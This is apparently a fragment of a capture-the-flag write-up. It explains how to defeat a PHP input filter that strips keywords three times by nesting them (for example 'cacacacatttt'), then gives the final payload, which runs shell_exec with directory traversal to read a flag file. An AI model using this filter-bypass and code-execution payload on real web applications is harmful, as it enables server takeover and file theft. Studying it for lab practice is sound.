notice that input is filtered 3 times, now to escape that filter we need to nest filtered commands, like so:
<?php --> <<<<????php
cat --> cacacacatttt
flag --> flaflaflaflagggg
as you can see i nested the commands four times so that after all the filtering is done we're left with the original command we intended
and the final payload:
<<<<????php echo shell_exec("cd ../../../../../../; cacacacatttt flaflaflaflagggg.php");????>>>>
flag{wait_but_i_fixed_it_after_my_last_two_blunders_i_even_filtered_three_times_:(((}
PHP - Useful Functions & disable_functions/open_basedir bypass